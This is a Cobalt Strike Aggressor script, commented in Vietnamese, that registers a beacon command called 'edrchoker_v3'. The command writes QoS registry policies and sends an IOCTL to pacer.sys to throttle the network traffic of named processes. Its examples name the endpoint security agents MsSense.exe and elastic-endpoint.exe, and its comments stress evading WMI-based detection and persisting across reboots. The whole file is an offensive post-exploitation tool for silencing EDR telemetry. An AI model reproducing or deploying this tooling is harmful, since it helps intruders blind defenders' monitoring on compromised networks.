# edrchoker_v3.cna — registry-based QoS + pacer.sys ZAW trigger, no WMI/COM
#
# v3 ghi thẳng vào registry (Group Policy QoS v1.0 format) — không có COM, không có WMI.
# Sau khi ghi, trigger IOCTL 0x128050 (ZAW event) lên \\.\PSCHED để pacer.sys reload policy.
#
# Ưu điểm: footprint thấp nhất, không trigger WMI provider events, Win XP -> Win 11 compatible.
#
# Giới hạn:
#   Win 10/11: ZAW event trigger thành công nhưng không có QoS Policy Manager chạy
#              để translate v1.0 registry thành TC flow per-socket → không throttle được.
#              Dùng edrchoker_v2 (WMI) cho Win 10/11.
#   Win 7:     v1.0 format + ZAW event có thể hoạt động (QoS PM còn active).
#              Test trước: edrchoker_v3 add rồi verify kết nối của target process.
#
# Persistence: có — policy tồn tại trong registry, active lại sau mỗi lần reboot
#              (khi Psched start, QoS PM trên Win 7 đọc lại registry tự động).
#
# Yêu cầu: Psched service phải RUNNING (sc query Psched).
#           Không cần eqos.sys (Enterprise QoS — driver riêng, Win 8+ only).
#
# Usage:
#   edrchoker_v3 add        "proc1.exe;proc2.exe"   ghi registry QoS entries + ZAW trigger
#   edrchoker_v3 remove     "proc1.exe;proc2.exe"   xóa policies matching + ZAW trigger
#   edrchoker_v3 remove_all                         xóa tất cả policies + ZAW trigger
#   edrchoker_v3 list                               liệt kê policies

alias edrchoker_v3 {
    local('$bof $args $bid $handle $path $cmd $procs');
    $bid = $1;
    $cmd = $2;

    if ($cmd is $null || $cmd eq "") {
        berror($bid, "[edrchoker_v3] usage: edrchoker_v3 <add|remove|remove_all|list> [procs]");
        return;
    }

    $procs = "";

    if ($cmd eq "add" || $cmd eq "remove") {
        if (size(@_) < 3 || $3 eq "") {
            berror($bid, "[edrchoker_v3] " . $cmd . " requires a process list: \"proc1.exe;proc2.exe\"");
            return;
        }
        $procs = $3;
    }

    $path   = script_resource("edrchoker_v3.x64.o");
    $handle = openf($path);
    if ($handle is $null) { berror($bid, "[edrchoker_v3] cannot open BOF: " . $path); return; }
    $bof = readb($handle, 1048576);
    closef($handle);
    if ($bof is $null) { berror($bid, "[edrchoker_v3] readb failed"); return; }

    if ($procs ne "") {
        btask($bid, "EDRChoker v3 (registry): " . $cmd . " " . $procs);
    } else {
        btask($bid, "EDRChoker v3 (registry): " . $cmd);
    }

    $args = bof_pack($bid, "zz", $cmd, $procs);
    beacon_inline_execute($bid, $bof, "go", $args);
}

beacon_command_register(
    "edrchoker_v3",
    "QoS throttle via v1.0 registry + pacer.sys IOCTL 0x128050 ZAW trigger (Win 7: works; Win 10/11: persistence only)",
    "Usage:\n" .
    "  edrchoker_v3 add        \"p1.exe;p2.exe\"   ghi registry QoS throttle + ZAW trigger\n" .
    "  edrchoker_v3 remove     \"p1.exe;p2.exe\"   xóa policies theo process + ZAW trigger\n" .
    "  edrchoker_v3 remove_all                   xóa TẤT CẢ QoS policies + ZAW trigger\n" .
    "  edrchoker_v3 list                         liệt kê active policies\n\n" .
    "Compat:\n" .
    "  Win 7:     v1.0 + ZAW CÓ THỂ throttle được (QoS Policy Manager còn active)\n" .
    "  Win 10/11: ZAW trigger thành công nhưng không enforce (QoS PM dead) → dùng v2\n\n" .
    "So sánh với v2:\n" .
    "  v2 (WMI): immediate Win 10/11, cần COM/WMI → WMI provider events\n" .
    "  v3 (reg): Win 7 + persistence cho Win 10/11, không COM/WMI → chỉ ADVAPI32 + kernel IOCTL\n\n" .
    "Prereq: sc query Psched → RUNNING\n\n" .
    "Examples:\n" .
    "  edrchoker_v3 add    \"MsSense.exe;elastic-endpoint.exe\"\n" .
    "  edrchoker_v3 remove \"MsSense.exe\"\n" .
    "  edrchoker_v3 remove_all\n" .
    "  edrchoker_v3 list\n\n" .
    "Verify:\n" .
    "  shell reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\QoS\n" .
    "  (Win 7: test kết nối process sau khi add)"
);
